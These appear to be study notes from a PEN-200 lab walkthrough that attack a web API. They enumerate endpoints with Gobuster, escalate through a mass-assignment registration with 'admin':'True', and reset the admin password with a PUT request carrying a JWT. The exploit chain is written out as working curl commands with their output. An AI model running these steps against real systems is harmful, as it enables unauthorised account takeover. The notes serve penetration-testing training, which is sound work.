API From PEN200
A BlackBox Approach
Taking a example http://192.168.199.16:5002/ is an API.
We can enumerate the API Endpoints by brute forcing using a wordlist.
API paths are often followed by a version number, resulting in a pattern such as:
/api_name/v1Using Gobuster
The API name is often quite descriptive about the feature or data it uses to operate, followed directly by the version number. With this information, let's try brute forcing the API paths using a wordlist along with the pattern Gobuster feature. We can call this feature by using the -p option and providing a file with patterns. For our test, we'll create a simple pattern file on our Kali system containing the following text:
{GOBUSTER}/v1
{GOBUSTER}/v2In this example, we are using the "{GOBUSTER}" placeholder to match any word from our wordlist, which will be appended with the version number.
┌──(kali㉿kali)-[~/webAttacks]
└─$ cat pattern
{GOBUSTER}/v1
{GOBUSTER}/v2
┌──(kali㉿kali)-[~/webAttacks]
└─$ gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p patternFuther We can enumerate the properties of a API Endpoint.
──(kali㉿kali)-[~/webAttacks]
└─$ gobuster dir -u http://192.168.199.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.199.16:5002/users/v1/admin/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/email (Status: 405) [Size: 142]
/password (Status: 405) [Size: 142]
Progress: 959 / 960 (99.90%)
===============================================================
Finished
===============================================================┌──(kali㉿kali)-[~/webAttacks]
└─$ curl http://192.168.199.16:5002/users/v1
{
"users": [
{
"email": "mail1@mail.com",
"username": "name1"
},
{
"email": "mail2@mail.com",
"username": "name2"
},
{
"email": "admin@mail.com",
"username": "admin"
}
]
}
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -i http://192.168.199.16:5002/users/v1/admin
HTTP/1.0 200 OK
Content-Type: application/json
Content-Length: 48
Server: Werkzeug/1.0.1 Python/3.7.13
Date: Sun, 15 Oct 2023 07:29:05 GMT
{"username": "admin", "email": "admin@mail.com"}
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -i http://192.168.199.16:5002/users/v1/admin/password
HTTP/1.0 405 METHOD NOT ALLOWED
Content-Type: application/problem+json
Content-Length: 142
Server: Werkzeug/1.0.1 Python/3.7.13
Date: Sun, 15 Oct 2023 07:30:46 GMT
{
"detail": "The method is not allowed for the requested URL.",
"status": 405,
"title": "Method Not Allowed",
"type": "about:blank"
}
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -X OPTIONS -i http://192.168.199.16:5002/users/v1/admin/password
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Allow: PUT, OPTIONS
Content-Length: 0
Server: Werkzeug/1.0.1 Python/3.7.13
Date: Sun, 15 Oct 2023 07:30:31 GMT
Checking Login/Register Functionalities
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -i http://192.168.199.16:5002/users/v1/login
HTTP/1.0 404 NOT FOUND
Content-Type: application/json
Content-Length: 48
Server: Werkzeug/1.0.1 Python/3.7.13
Date: Sun, 15 Oct 2023 07:33:18 GMT
{ "status": "fail", "message": "User not found"}
──(kali㉿kali)-[~webAttacks]
└─$ curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json' http://192.168.199.16:5002/users/v1/login
{ "status": "fail", "message": "Password is not correct for the given username."}
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -d '{"password":"lab","username":"getsystem","email":"asd@asd.com","admin":"True"}' -H 'Content-Type: application/json' http://192.168.199.16:5002/users/v1/register
{"message": "Successfully registered. Login to receive an auth token.", "status": "success"}
┌──(kali㉿kali)-[~webAttacks]
└─$ curl -d '{"password":"lab","username":"getsystem"}' -H 'Content-Type: application/json' http://192.168.199.16:5002/users/v1/login
{"auth_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2OTczNTU4MjksImlhdCI6MTY5NzM1NTUyOSwic3ViIjoiZ2V0c3lzdGVtIn0.PuaWLymbmn6jaf1qCoURmyjJ6Xbm9onFgqwdf_-Ipt4", "message": "Successfully logged in.", "status": "success"}
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -X PUT -i http://192.168.199.16:5002/users/v1/admin/password -H 'Content-Type: application/json' -H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2OTczNTU4MjksImlhdCI6MTY5NzM1NTUyOSwic3ViIjoiZ2V0c3lzdGVtIn0.PuaWLymbmn6jaf1qCoURmyjJ6Xbm9onFgqwdf_-Ipt4' -d '{"password": "pwned"}'
HTTP/1.0 204 NO CONTENT
Content-Type: application/json
Server: Werkzeug/1.0.1 Python/3.7.13
Date: Sun, 15 Oct 2023 07:41:23 GMT
Last updated